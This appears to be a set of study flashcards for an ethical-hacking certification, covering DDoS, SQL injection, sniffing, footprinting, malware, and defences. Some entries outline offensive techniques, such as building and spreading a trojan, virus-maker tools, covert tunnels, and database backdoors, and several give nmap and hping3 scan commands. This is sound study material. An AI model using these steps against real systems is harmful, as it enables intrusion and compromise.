-Implement Domain Name System Security Extension (DNSSEC). -Resolve all DNS queries to local DNS server. -Use Secure Socket Layer (SSL) for securing the traffic -Block DNS requests from going to external servers. Have resolver use new, random source port for each outgoing query. -Configure firewall to restrict external DNS lookup -Implement intrusion detection system (IDS) and deploy it correctly -Configure DNS resolver to use a new random source port for each outgoing query -Restrict DNS recusing service, either full or partial, to authorized users -Use DNS Non-Existent Domain (NXDOMAIN) Rate Limiting -Secure your internal machines
DoS/DDoS Protection Software
-Incapsula DDoS Protection -quickly mitigates any size attack without getting in the way of legitimate traffic or increasing latency. -Anti DDoS Guardian -DDoS-GUARD -Cloudflare -DOSarrest's DDoS protection service -DefensePro -F5 -DDoSDefend -NetFlow Analyzer -Wireshark -NetScaler AppFirewall -Andrisoft Wanguard -SDL Regex Fuzzer
Botnets setup
-Installing a bot in the victim machine by using a trojan horse, which carries the bot payload which is forwarded to the victims using phising or redirecting the victim to a malicious site. -Once the trojan is executed, the victim will be infected and get in control of the handler, waiting for the instruction by the C&C. -The handler is the bot command and control which send the instruction to these infected system (bots to attempt an attack on a primary target.
HTTPS GET/POST Attack
-Layer 7 attack, requires less bandwidth GET Attack - attacker uses time delayed HTTP header to hold on to HTTP connection and exhaust web server resources. The attacker never sends full request to the target server. As a result, server holds on to the HTTP connection and keeps waiting making the server down for the legitimate users. In these types of attacks, all the network parameters will look good but the service will be down. POST Attack - the attacker sends the HTTP requests with complete headers but incomplete message body to the target web server or application. Since the message body is incomplete, the server keeps waiting for the rest of the body thereby making the web server or web application not available to the legitimate users. This is a sophisticated layer 7 attack, which does not use malformed packets, spoofing, or reflection techniques. This type of attack requires less bandwidth than that of other attacks to bring down the targeted site or web server. The aim of this attack is to compel the server to allocate as many resources as possible to serve the attack, thus denying legitimate users access to the server's resources.
Mobile Firewalls
-Mobiwol: NoRoot Firewall -Mobile Privacy Shield -NetPatch Firewall
Footprinting: Websites
-Monitoring and analyzing target website -May provide SW use, OS use, sub-dirs. & file paths, contact info Tools - BurpSuite, ZaProxy, Paros Proxy, Firebug and website informer These tools allow attacker to view headers that provide connection status and type, accept-ranges and last-modified info, x-powered-by information, web server in use and its version -Examining HTML souce provides and coments -Contact details of web developer -File system structure and script type -Examining cookies may provide -Software in use and its behavior -Scripting platforms used
Covering Tracks on Network
-Reverse HTTP shell- victim executes HTTP GET -Reverse ICMP Tunnel- uses echo & reply packets as carrier of TCP payload -DNS Tunnel- payload in queries & replies -TCP parameters- IP ID, TCP ACK#, Initial sequence # (distribute the payload and to create covert channels)
Proxy Tools for Mobile
-Shadowsocks -ProxyDroid - Supports HTTP, HTTPS, SOCKS4, SOCKS5 proxy and basic NTLM, NTLMv2 authentication methods -CyberGhost VPN -Hotspt Sheild -Netshade
How IDS detects Intrusions
-Signature Recognition -Anomaly Detection -Protocol Anomaly detection
Shrink-Wrap Code Attacks
-Software developers often use free libraries and code licensed from other sources in their programs to reduce development time and cost. -This means that large portions of many pieces of software will be the same, and if an attacker discovers vulnerabilities in that code, many pieces of software are at risk.
Network Intrusions: General indications of network intrusions include:
-Sudden increase in bandwidth consumption -Repeated probes of the available services on your machines -Connection requests from IPs other than those in the network range, indicating that an unauthenticated user (intruder) is attempting to connect to the network -Repeated login attempts from remote hosts -A sudden influx of log data could indicate attempts at Denial-of-Service attacks, bandwidth consumption, and distributed Denial-of-Service attacks
Senior management
-There responsibility is to supervise the risk management plans carried out in an organization. -They develop policies and techniques required to handle the commonly occurring risks. -There expertise can design the steps required for handling future risk.
Business and Functional Managers
-They are responsible for maintaining all management processes in an organization and making trade-off decisions in the risk management process. -They are empowered with an authority to manage almost all the processes in an organization.
Criteria for Vuln Assessment Tools
-Types of vulnerabilities being assessed: -Testing capability of scanning: -Ability to provide accurate reports: -Efficient and accurate scanning: -Capability to perform smart search: -Functionality for writing own tests -Test run scheduling
DoS/DDoS Attack Techniques
-UDP flood attack -ICMP flood attack -Ping of Death attack -Smurf attack -SYN flood attack -Fragmentation attack -HTTPS GET/POST attack -Slowloris attack -Multi-Vector attack -Peer-to-Peer attack -Permanent Denial-of-Service attack -Distributed Reflection Denial-of-Service (DrDoS)
Kerberos Authentication
-User request to Authentication Server (AS) -AS reply to user -User asks Ticket Granting Server(TGS) for ticket -TGS replies to user with Ticket Granting Ticket -User sends TGT to AS for access to svc AS authenticates/validates to user AS and TGS are within the KDC (Key Distriution Center) A network authentication protocol that provides strong authentication for client/server applications by using secret-key cryptography. This provides mutual authentication, in that both the server and the user verify each other's identity. -Messages sent through this protocol are protected against replay attacks and eavesdropping. -makes use of the Key Distribution Center (KDC), a trusted third party -This consists of two logically distinct parts: an Authentication server (AS) and a Ticket Granting Server (TGS). -uses "tickets" to prove a user's identity.
Production Network Zone
-known as a restricted zone -supports functions for which access should be limited -It strictly controls direct access from uncontrolled networks. Typically, a restricted zone employs one or more firewalls to filter inbound and outbound traffic
Creating Virus
-o Writing a simple virus program -o Using Virus Maker Tools -DELmE's Batch Virus Maker - pre-made viruses for infecting PCs -JPS Virus Maker -used to create their own customized virus. And can be used to check the reliability of new anti-virus software
where does rusers on Unix/linux live?
/usr/bin/rusers
Kinds of propagation of malicious codes
1. Central Source propagation 2. Back-Chaining Propagation 3.Autonomous Propagation
Defend Against Sniffing
1. Restrict the physical access to the network 2. Use end-to-end encryption to protect confidential information 3. Permanently add the MAC address of the gateway to the ARP cache. 4. Use static IP addresses and ARP tables 5. Turn off network identification broadcasts 6. Use IPv6 instead of IPv4 protocol. 7. Use PGP and S/MIME, VPN, IPSec, SSL/TLS, Secure Shell (SSH), and One-time passwords (OTP). 8. Retrieve MAC directly from NIC instead of OS 9. Change default passwords to complex passwords
Working of DHCP
1. The client broadcasts DHCPDISCOVER/SOLICIT request asking for DHCP Configuration Information. 2. DHCP-relay agent captures the client request and unicasts it to the DHCP servers available in the network. 3. DHCP server unicasts DHCPOFFER/ADVERTISE, which contains client and server's MAC address. 4. Relay agent broadcasts DHCPOFFER/ADVERTISE in the client's subnet. 5. The client broadcasts DHCPREQUEST/REQUEST asking DHCP server to provide the DHCP configuration information. 6. DHCP server sends unicast DHCPACK/REPLY message to the client with the IP config and information.
Malware Analysis: Preparing testbed
1. allocate a physical system for the analysis lab 2. install Virtual machine on the system 3. install guest OSs in the virtual machines 4. isolate the system from the network by ensuring that the NIC card is in host only mode 5. simulate internet services using tools such as iNetSim 6. disable the shared folders and the guest isolation 7. install malware analysis tools 8. generate hash value of each OS and tool 9. copy the malware over to the guest OS
How to create a Trojan
1. create a new Trojan packet using a Trojan Horse Construction Kit 2. create a dropper, which is a part in a trojanized packet that installs the malicious code on the target system 3. Create a wrapper, using various wrapper tools such as petite.exe, Graffiti.exe, IExpress Wizard, and Elite Wrap, to help bind the Trojan executable to legitimate files to install it on the target system 4. propagate the Trojan, implementing various methods such as sending it via email and instant messengers, tricking users to download and execute it. 5. Execute the Dropper, software used by attackers to disguise their malware (viruses, Trojans, worms, etc.). It is an executable file containing other compressed files. Dropper appears to users to be a legitimate application or well-known and trusted file. 6. execute the damage routine
Steps Pen Testing IoT devices
1. discover IoT devices 2. hardware analysis 3. firmware and OS analysis 4. wireless protocol analysis 5. mobile application testing 6. web application testing 7. cloud services testing 8. document all the findings
OWASP Top 10 IoT Vulnerabilities
1. insecure Web interface 2. Insufficient authentication/ authorization 3. insecure network services 4. lack of transport encryption/ integrity verification 5. privacy concerns 6. insecure cloud interface 7. insecure mobile interface 8. insufficient security configuribility 9. insecure software/ firmware 10. poor physical security
IMAP port
143
Deterrent Control
A control that attempts to discourage security violations before they occur send warning messages to the attackers to discourage an intrusion attempt. These controls reduce attacks on the cloud system
Types of Banner Grabbing
Active banner grabbing -applies the principle that an operating system's IP stack has a unique way of responding to specially crafted TCP packets -happens because of different interpretations that vendors apply while implementing the TCP/IP stack on the particular OS. -attacker sends a variety of malformed packets to the remote host, and the responses are compared to a database. Passive Banner Grabbing - instead of relying on scanning the target host, passive fingerprinting captures packets from the target host via sniffing to study for telltale signs that can reveal an OS Passive banner grabbing includes: o Banner grabbing from error messages o Sniffing the network traffic: o Banner grabbing from page extensions
Pros and Cons of a Hardware Firewall
Advantage o Security: A hardware firewall with its operating system (OS) is considered to reduce the security risks and has increased the level of security controls. o Speed: Hardware firewalls initiate faster responses and enable more traffic. o Minimal Interference: Since a hardware firewall is a separate network component, it enables better management and allows the firewall to shut down, move or be reconfigured with less interference on the network. Disadvantages: o More expensive than a software firewall. o Hard to implement and configure. o Consumes more space and involves cabling.
Keyloggers for Windows
All In One keylogger an invisible keylogger surveillance software that allows you to record keystrokes and monitors each activity of the computer user. -It allows you to secretly track all such activities and automatically receive logs sent to the email/FTP/LAN account of your choice. Spyrix Personal monitor SoftActivity Elite Keylogger Micro Keylogger
Access Control Attack: War Driving
Also called access point mapping, is the act of locating and possibly exploiting connections to wireless local area networks while driving around a city or elsewhere wireless LANS are detected either by sending probe requests over a connection or by listening to web beacons
arin.net
American way to get an ip address
WifiExplorer
An 802.11 network discovery tool --also known as a Wi-Fi scanner. It was designed for mobile platforms - in particular, Android phones and tablets. Using the device's built-in 802.11 radio, it collects information about nearby wireless access points and displays the data in useful ways. The diagnostic views are helpful when installing and troubleshooting Wi-Fi networks. It uses 5 diagnostic views that collectively provide an overview of the current Wi-Fi environment. In the 'normal' mode, all APs are displayed, while in the 'Monitor Mode' only the APs of interest are displayed.
Browser-Based Point of Attack : Buffer Overflow
An abnormality whereby a program, while writing data to a buffer, surfeits the intended limit and overwrites the adjacent memory.
Wireless MITM Atk
An active Internet attack in which the attacker attempts to intercept, read, or alter information between two computers. Associated with an 802.11 WLAN, as well as with wired communication systems Used to eavesdrop or manipulate Aircrack-ng
Ciphers
An algorithm (a series of well-defined steps) for performing encryption and decryption. (*note* -Encipherment is the process of converting plain text into a cipher or code; the reverse process is called decipherment.)
SQL Injection Query
An attacker submits a request with values that will execute normally but will return data from the database that attacker wants.
IoT Framework Security Considerations : Mobile
An ideal framework for the this interface should include proper authentication mechanism for the user, account lockout mechanism after a certain number of failed attempts, local storage security, encrypted communication channels and the security of the data transmitted over the channel.
Burp Suite
An integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. It contains key components such as an intercepting proxy, application-aware spider, advanced web application scanner, intruder tool, repeater tool, sequencer tool, and more.
Add-on Viruses
Append their code to the host code without making any changes to the latter or relocate the host code to insert their own code at the beginning
By using CAPTCHA
Application layer-based DDoS attack which sends at least 1000 malicious POST requests per second spread through the entire globe can be countered how?
Application Flaws
Applications should be secured using validation and authorization of the user. it is important for developers to understand the anatomy of common security vulnerabilities and develop highly secure applications by providing proper user validation and authorization
Application-based Point of Attack : Configuration Manipulation
Apps may use external configuration files and libraries, modifying those entities or affecting apps' capability of using those results in a configuration manipulation attack
Application-based Point of Attack : No Encryption/Weak Encryption
Apps that transmit data unencrypted or weakly encrypted are susceptible to attacks such as session hijacking.
Virus Hoaxes
Are false alarms claiming reports about a non-existing virus which may contain virus attachment Warning messages propagating that a certain email message should not be viewed and doing so will damage one's system
Vulnerability Assessment: Inference-Based
Assessment is mainly focused on the hierarchical interdependent vulnerabilities, such as server-based vulnerabilities or device-based vulnerabilities? Scans ports & services to determine relevant tests
Network, Transport
At which two traffic layers do most commercial IDSes generate signatures? (Select Two) -Application layer -Network layer -Session layer -Transport layer
RFcrack
Attackers use this tool to obtain the rolling code sent by the victim to unlock a vehicle and later use the same code for unlocking and stealing the vehicle.
Footprinting Websites: Web Spiders
Automated searches on target website for employee names, email address, etc.. Tools -Web Data - It extracts targeted contact data (email, phone, and fax) from the website, extracts the URL and meta tag (title, description, keyword) for website promotion, searches directory creation, web research and so on. -Extractor - SpiderFoot -Visual-seo, -Wildshark -Beam us up -Scrapy -Streaming Frog -Xenu
sqlmap
Automates the process of detecting and exploiting SQL injection flaws and taking over the database servers.Python Script, low failure rate and comes with w3af. Most important tool for injection testing/exploitation. Features o Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band o Support to directly connect to the database without passing via an SQL injection, by providing DBMS credentials, IP address, and port and database name o Support to enumerate users, password hashes, privileges, roles, databases, tables, and columns
Linear Cryptanalysis
Based on finding affine approximations to the action of a cipher. It is commonly used on block ciphers. It is a known plaintext attack and uses a linear approximation to describe the behavior of the block cipher.
Vulnerability Assessment: Tree-Based
Basically each step is decided by an admin pg 147
How to Defend Against Wireless Attacks: Configuration
Best practice o Change the default SSID after WLAN configuration. o Set the router access password and enable firewall protection. o Disable SSID broadcasts. o Disable remote router login and wireless administration. o Enable MAC Address filtering on your access point or router. o Enable encryption on access point and change passphrase often
Sniffing Telnet and Rlogin (23 & 513)
Both the protocols fail to provide encryption; so the data traversing between the clients connected through any of these protocols is in plain text and vulnerable to sniff. Attackers can sniff keystrokes including usernames and passwords.
Competitive Intelligence Resources
Business origins/development: EDGAR database, Hoovers LexisNexis, Business Wire Business Plans/Financials: SEC Info, Experian, Market Watch, Wall Street Monitor, Euromonitor
Directional Antenna
Can broadcast and receive radio waves from a single direction. -helps in reducing interference.
Ransom Families
Cerber CTB-Locker Scatter Cryakl Crysis CryptXXX Cryptorbit ransomware Crypto Locker Ransomware Crypto Defense Ransomware Crypto Wall Ransomware Police-themed Ransomware
Qualys VM
Cloud-based svc built to ID threats and monitor changes features o Agent-based detection o Constant monitoring and alerts o Comprehensive coverage and visibility o VM for the perimeter-less world o Discover forgotten devices and organize your host assets o Identify and prioritize risks
Static Malware Analysis
Code analysis, involving going through the executable binary code without actually executing it to have a better understanding of the malware and its purpose
Packet Fragment Generators
Colasoft Packet Builder NetScanTools Pro Ostinato WAN Killer WireEdit hping3 Multi-Generator (MGEN)
hping3 192.168.1.103 -Q -p 139 -s
Collect TCP sequence numbers on port 139 -Q -Hping collects all the TCP sequence numbers generated by the target host
OWASP A9: Using Components w/ Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
Zombies
Compromised systems which is controlled by a master computer (attack) or controlling zombies through handler provide support to initiate a DDoS attack.
Footprinting: Alerts
Content monitoring services that provide up to date info based on your preference usually via email or SMS in an automated manner -Google Alerts, -Twitter Alerts, -Giga Alert -TalkWalker Alerts
Vulnerability Management Life Cycle
Create baseline Vuln assessment Risk Assessment Remediation Verification Monitor pg 144
TCP/UDP 53
DNS Zone Transfer -DNS message size exceeds the default size of UDP (512 octets) -this approach, the DNS server uses UDP as a default protocol and in case of lengthy queries where UDP fails, uses TCP as a backup failover solution. -Some malwares such as ADM worm, Bonk Trojan, etc. use port 53 to exploit vulnerabilities within DNS servers.
WatchGuard WIPS
Defends your airspace 24/7 from unauthorized devices, rogue APs, and malicious attacks and with close to zero false positives. Features: o Defends Against Rogue Aps o Prevents Evil Twin o Shuts Down Denial-of-Service Attacks
Stages of Virus Life
Design - developing virus code using programming languages or construction list Replication - virus replicates itself for a period of time within the target system and then spreads itself Launch - it gets activated with the user performing certain actions such as running an infected program Detection - a virus is identified as a threat to infected target systems Incorporation - Antivirus software developers assimilate defenses against the virus Execute the damage routine - users install antivirus updates and eliminate the virus threats
Types of Spyware
Desktop spyware. USB Spyware Audio Spyware Video Spyware Cellphone/telephone Spyware GPS Spyware Email spyware
Nmap
Discover virtual domains with hostmap *$nmap --script hostmap* Detect a vulnerable server that uses the TRACE method *nmap --script http-trace -p80 localhost* Harvest email accounts with http-google-email *$nmap --script http-google-email* Enumerate users with http-userdir-enum *nmap -p80 --script http-userdir -enum localhost* Detect HTTP TRACE *$nmap -p80 --script http-trace* Enumerate common web applications *$nmap --script http-enum -p80* Obtain robots.txt *$nmap -p80 --script http-robots.txt*
nbstat -r
Displays a count of all names resolved by broadcast or WINS server.
nbtstat -c
Displays the NetBIOS name cache of the local computer, resolved names
nbstat -n
Displays the names registered locally by NetBIOS applications such as the server and redirector
DNSSEC
Domain Name System Security Extensions. --A suite of specifications used to protect the integrity of DNS records and prevent DNS poisoning attacks.
SNiffing HTTP (80)
Due to vulnerabilities in the default version of HTTP, websites implementing HTTP transfer user data across the network in plain text, which the attackers can read to steal user credentials.
Evasion Technique: Declare Variable
During web sessions, an attacker carefully observes all the queries that can help him/her to acquire important data from the database. Using those queries, an attacker can identify a variable that can be used to pass a series of specially crafted SQL statements to create a sophisticated injection that can easily go undetected through the signature mechanism.
Time-To-Live (TTL) Atk
Each IP packet has a field called Time to Live (TTL), which indicates how many hops the packet can take before a network node discards it. Typically, when a host sends a packet, it sets the TTL to a value high enough that it can reach its destination under normal circumstances. Different OSs use different default initial values for the TTL. Because of this, attackers can guess the number of routers between them and a sending machine, and make assumptions on what the initial TTL was, thereby guessing which OS a host is running, as a prelude to an attack.
Password Recovery Tools
Elcomsoft Distributed Password Recovery - breaks complex passwords, recovers strong security keys, and unlocks documents . -It allows for the execution of mathematically intensive password recovery code on the parallel computational elements found in modern graphic accelerators by employing an innovative technology to accelerate password recovery, >Passware Kit Forensic >Stellar Phoenix Password Recover >Windows password recovery tool ultimate >hashcat >PCUnlocker >iSumsoft Windows Password >Refixer
How to Predict a Session Token/ Where are Session tokens hidden
Embedding in the URL, which is received by the GET request in the application when the links embedded within a page are clicked by clients Embedding in the form as a hidden field and submitted to the HTTP's POST command In cookies on the client's local machine
Defend Against DHCP Starvation
Enable port security -limits the maximum number of MAC addresses on the switch port. When the limit is exceeded, the switch drops subsequent MAC address requests (packets) coming from external sources which safeguard the server against a DHCP starvation attack
War Driving Tools
Enable users to list all APs broadcasting beacon signals at their location. o Airbase-ng o MacStumbler o AirFart o 802.11 Network Discovery Tools o G-MoN
Net View
Enumerating Shared Resource -a command line utility that displays a list of computer or network resources. It displays a list of computers in the specified workgroup or shared resources available on the specified computer.
Two most common types of In-Based SQL
Error-Based -Attackers intentionally insert bad input into an application causing it to throw database errors. Union SQL - an attacker uses a UNION clause to append a malicious query to the requested query -attacker checks for the UNION SQL Injection vulnerability by adding a single quote character (') to the end of a ".php? id=" command.
Evasion Technique: In-line Comment
Evasion technique is successful when a signature filters white spaces in the input string Obscures input strings by inserting in-line comments between SQL keywords.
Privilege Escalation by Exploiting Vulnerabilities
Exploiting 0-days or known flaws to bypass security & gain privileged access
Key Reinstallation Attack (KRACK)
Exploiting the 4-way handshake of the WPA2 protocol Forcing Nonse reuse
hping3 -F -P -U 10.0.0.25 -p 80
FIN, PUSH, URG scan on port 80
Twofish
Feistel cipher with 128-bit blocks & up to 256-bit keys
General Indications of Intrusion
File System- unfamiliar files, permissions Network- probes, log data System- logs, sys performance, processes
Foot Printing: Locate Network Range
Find range of ipaddress using ARIN whois database search tool Can find range of IPs and subnet mask used by target org for the RIR Regional Internet Registry
Types of Bandwidth depletion
Flood attack - involves zombies sending large volumes of traffic to victim's systems in order to clog these systems' bandwidth Amplification attack - engages the attacker or zombies to transfer messages to a broadcast IP address. This method amplifies malicious traffic that consumes victim systems' bandwidth
Service Discovery
Footprinting the web infrastructure provides data about the services offered, such as exchange and encryption of data, path of transmission, and protocols deployed. nmap -A multi-platform, multi-purpose applications used to perform footprinting of ports, services, operating systems, etc. -It is used for network discovery and security auditing. o NetScan Tools Pro o Sandcat Browser
IoT Framework Security Considerations : Edge
Framework consideration for this would be proper communications and storage encryption, no default credentials, strong passwords, use latest up to date components and so on.
Skyhook
GPS Mapping tool Wi-Fi Positioning System (WPS) determines location based on Skyhook's massive worldwide database of known Wi-Fi APs It uses a combination of GPS tracking and a Wi-Fi positioning system to determine the location of a wireless network indoor and in urban areas. Features: o Makes location precise and reliable where it counts, even in hard-to-reach urban and indoor environments o Uses multiple location sources to verify device location o Builds a living network of geolocated IP addresses by matching precise GPS and Wi-Fi data with the IP address from billions of location requests o Provides precise positioning data even when an Internet connection is unavailable o Toggles clusters of nearby geofences on and off for each device based on its location
CEH Hacking Methodology (CHM)
Gaining Access Maintaining Access Clearing tracks
Attack Authentication Mechanism
Generally, web applications authenticate users through authentication mechanisms such as login functionality. o Attackers can enumerate user names in two ways: verbose failure messages (need password and user name) and predictable user names (auto generates). o Passsword attack -THC-Hydra -cracker o Session Attack o Cookie Explitation o Cookie sniffing o Cookie reply - OWASP Zed Attack Proxy -L0phtCrack - cookie exploitation tools
Creating Server Backdoors
Getting OS shell o Using Outfile o Finding Directory Structure o Using Built-in DBMS Functions o Creating Database Backdoors -DB triggers
Command Shell Trojans
Gives remote control of a command shell on a victim's machine A Trojan server is installed on the victim's machine and it opens a port allowing the attacker to connect Latest Trojans - NetCat, DNS Messenger, GCat
HTTP POST Request
HTTP POST Request carries the requested data as a part of the message body. Thus, it is considered more secure than HTTP GET
Medium-range Wireless Communication
Ha-low LTE advanced
Keystroke Logger Types
Hardware key loggers -"sit" between keyboard hardware and the operating system, so that they can remain undetected and record every keystroke. Software key loggers
SQL Power Injector
Helps attackers find and exploit SQL injections on a web page. It is SQL Server, Oracle, MySQL, Sybase/Adaptive Server, and DB2 compliant, but it is possible to use it with any existing DBMS when using in-line injection (normal mode). It can also perform blind SQL injection. Features o Create/modify/delete loaded string and cookies parameters directly in the datagrids o Single and Blind SQL injection o Response of the SQL injection in a customized browser o Fine tuning parameters and cookies injection o Can parameterize the size of the length and count of the expected result to optimize the time taken by the application to execute the SQL injection
Types of Privilege Escalation
Horizontal- similar privileges, different user acct Vertical- increased privileges
16-bit
How many bit checksum is used by the TCP protocol for error checking of the header and data and to ensure that communication is reliable? -16-bit -15-bit -13-bit -14-bit
hping3 -1 10.0.0.25
ICMP Ping -1 (one) -hping sends ICMP-echo request to 10.0.0.25 and receives ICMP-reply, the same as with a ping utility.
How IDS works
IDSs have sensors to detect malicious signatures in data packets, and some advanced IDSs have behavioral activity detection, to determine malicious traffic behavior. Even if the packet signatures do not match perfectly with the signatures in the IDS signature database, the activity detection system can alert administrators about possible attacks. If the signature matches, the IDS performs predefined actions such as terminating the connection, blocking the IP address, dropping the packet, and/or signaling an alarm to notify the administrator. When signature matches, anomaly detection will skip; otherwise, the sensor may analyze traffic patterns for an anomaly. When the packet passes all tests, the IDS will forward it into the network.
What is IAM
Identity and Access Management -It ensures that the right users obtain access to the right information at the right time
Defend Against ARP Poisoning
Implementation of Dynamic ARP Inspection (DAI) - a security feature that validates ARP packets in a network. Implementation of cryptographic protocols Implement software that runs custom scripts to monitor ARP tables.
Blind/Inferential SQL Injection
In case of SQL injection, no data is transmitted through the web application, and it is not possible for an attacker to retrieve the actual result of the injection; therefore, it is called blind SQL injection. takes longer time to execute because the result returned is generally in the form of boolean. Attackers can steal the data by asking a series of true or false questions through SQL statements. Used when database has custom error messages
Access Control Attack: Rogue Access Point (AP)
In order to create a backdoor into a trusted network, an attacker may install this inside a firewall It is an access point installed on a trusted network without authorization. placed into an 802.11 network to hijack the connections of legitimate network users.
Active Reconnaissance
In this case, the perpetrator may send probes to the targe in the form of port scans, network sweeps, enumeration of shares and user accounts, and so on
Peer-to-peer Attacks
In this kind of attack, the attacker exploits a number of bugs in peer-to-peer servers to initiate a DDoS attack. Attackers exploit flaws found in the network that uses DC++ (Direct Connect) protocol, which allows the exchange of files between instant messaging clients Does not use botnets, the attack eliminates the need of attackers to communicate with the clients it subverts Here, the attacker instructs clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and instead, to connect to the victim's website. Can be minimized by specifying ports for peer-to-peer communication - specifying port 80 not to allow peer-to-peer communication minimizes the possibility of attacks on websites.
ICT
Information and Communication Technology
How to Defend Against LDAP Injection Attacks
Injection attack is similar to SQL injection: attacks on web apps co-opt user input to create LDAP queries o Perform type, pattern, and domain value validation on all input data o Make LDAP filter as specific as possible o Validate and restrict the amount of data returned to the user o Implement tight access control on the data in the LDAP directory o Perform dynamic testing and source code analysis
OWASP A10: Insufficient Logging/Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
Detecting Rootkits
Integrity-based: snapshots (new vs baseline) Signature-based: screens DB of rootkit fingerprints Heuristics/Behavior: deviations from norm Runtime Execution Path: compares before & after Cross-view: enumerates critical elements, hashes results & compares to baseline
what is IPC$
Inter Process Communication ($ denotes share)
Short-range communication : Wi-Fi Direct
It is used for peer-to-peer communication without the need of a wireless access point. These devices start communication only after deciding which device will act as an access point.
IoT OS : RealSense OS X
It is used in Intel's depth sensing technology. Therefore, it is implemented in cameras, sensors, etc
Footprinting: Job Sites
Job requirements, Employee data, HW/SW info -Glassdoor, -LinkeIn, -Monster, -Indeed
Anti-Malware Softwar
Kaspersky Internet Security -McAfee -Norton -Bitdefender -Hitman Pro -ClamWIn
ZeuS trojan structure
Kernek32.dll - to access/manipulate memory files and hardware Advapi32.dll - to access/manipulate Service Manager and Registry User32.dll to display and manipulate graphics
Frequency-hopping Spread Spectrum (FHSS)
Known as Frequency-Hopping Code Division Multiple Access (FH-CDMA), is a method of transmitting radio signals by rapidly switching a carrier among many frequency channels. It decreases the efficiency of unauthorized interception or jamming of telecommunications.
TCP/UDP 389
LDAP (Lightweight Directory Access Protocol) -LDAP is a protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network.
what is SoftTerra?
LDAP enumeration/management tool
Ciphertext-only Attack
Less effective and much more likely for the attacker. The attacker only has access to a collection of cipher texts
Microsoft Baseline Security Analyzer (MBSA)
Lets admins scan local & remote systems for missing updates & common security configs A tool designed for IT professionals and helps small-and medium-sized businesses to determine their security state in accordance with Microsoft security recommendations.
Microsoft Baseline Security Analyzer (MBSA)
Lets admins scan local & remote systems for missing updates & common security configs command line interface that can perform local or remote scans of Microsoft Windows systems
Finger
Linux emumaration command -displays information about system users such as user's login name, real name, terminal name, idle time, login time, office location and office phone numbers.
Macof
Mac flooding tool for Linux
DNS MX record
Mail Exchange -ID's your email servers within your domain -Points to domain's mail server
LLMNR/NBT-NS Spoofing tools
Metasploit - Create a route statement in the meterpreter, in pe testing NBNSpoof
Cloud Pen Testing
Method of actively evaluating the security of a cloud system by simulating an attack from a malicious source. Security posture of cloud should be monitored regularly to determine the presence of vulnerability and the risks they pose. Cloud security is based on the shared responsibility of both cloud provider and the client
TCP/UDP 135
Microsoft RPC (Remote Procedure Call) -RPC is a protocol used by a client system to request a service from the server. - This vulnerability could allow an attacker to send RPC messages to the RPC End point Mapper process on a server, in order to launch a Denial of Service (DoS) attack.
Fuzz Testing Strategies
Mutation-Based: -In this type of testing, the current data samples creates new test data and the new test data will again mutate to generate further random data. This type of testing starts with a valid sample and keeps mutating until the target is reached. Generation-Based: -In this type of testing, the new data will be generated from scratch and the amount of data to be generated are predefined based on the testing model Protocol-Based: - In this type of testing, protocol fuzzer sends forged packets to the target application that is to be tested. -This type of testing requires detailed knowledge of protocol format being tested. -This type of testing involves writing a list of specifications into the fuzzer tool and then performing the model based test generation technique to go through all the listed specifications and add the irregularities in the data contents, sequence etc.
Vulnerability Scanning tools
Nessus, GFI Lan Guard, Qualys, Retina CS, OpenVAS
Create/Modify NTFS Streams
Notepad is stream-compliant -Hiding Trojan.exe (malicious program) into Readme.txt (stream) -Creating a link to the Trojan.exe stream inside the Readme.txt file: - Executing the Trojan:
Transfer DB to Attacker Machine
OPENROWSET on Remote port 80
Footprinting: Tracking online reputation of the target
ORM Online Reputation Management is the process of monitoring a company's rep on the internet and taking actions to minimize negative reviews. -Attackers use ORM tools to track company's online reputation, search engine rankings, obtain email notifications when a company is mentioned online, track convos, and obtain social news. Trachkur - provides social media monitoring Brand24 Social Mention ReviewTrackers Rankur
How to identify Target Systems OS
OS - TTL - Windows size Linux (Kernel 2.4 and 2.6) -64- 5840 Google Linux -64-5720 FreeBSD -64 -65535 OpenBSD - 64 - 26384 Windows 95 -32 -8192 Windows 2000 -128 -16384 Windows XP -128 -65535 Windows 98, Vista and 7 (Server 2008) -128 - 8192 iOS 12.4 (Cisco Routers) - 255 -4128 Solaris 7 -255 - 8760 AIX 4.3 -64 -6384
Common Vulnerability Scoring System (CVSS)
Open framework for communicating the characteristics & impacts of IT vulnerabilities CVSS assessment consists of three metrics for measuring vulnerabilities: o Base Metrics: It represents the inherent qualities of a vulnerability o Temporal Metrics: It represents the features that keep on changing during the lifetime of a vulnerability. o Environmental Metrics: It represents the vulnerabilities that are based on a particular environment or implementation.
Intrusive Viruses
Overwrite the host code partly or completely with the viral code
NTP Enumeration Tools
PRTG Network Monitors - monitors all systems, devices, traffic and applications of the IT infrastructure using various technologies such as SNMP, WMI, SSH, etc. Nmap Wireshark udp-proto-scanner NTP Time Server Monitor
Sniffer Detection Techniques
Ping- useful in detecting a system that runs in promiscuous mode Reverse DNS lookup- checks for increasing network traffic ARP- sends a non-broadcast ARP to all the nodes in the network, devices in promiscuous mode will respond
DNS PTR Record
Pointer: -maps IP address to hostname
Backdoors
Program designed to deny or disrupt operation, gather information that leads to exploitation or loss of privacy, gain unauthorized access to system resources
Static Malware Analysis- Identifying File Dependencies
Program need to work with internal system files to function properly Programs store the import and export functions in kernel32.dll file Check the dynamically linked list in the malware executable file Finding out all the library functions may allow to guess what the malware program can do Use tools such as Dependency walker to identify the dependencies within the executable file
Proxy Tools
Proxy Switcher - allows you to surf the Internet anonymously without disclosing your IP address. It also helps you to access various blocked sites in the organization Proxy Workbench - a proxy server that displays the data passing through it in real time and allows you to drill into particular TCP/IP connections, view their history, save the data to a file, and view the socket connection diagram. CyberGhost - VPN allows users to protect their online privacy, surf anonymously, and access blocked or censored content. Tori Burp Suite Hotspot Sheild Proxifiel Charles Fiddler
Transposition cipher
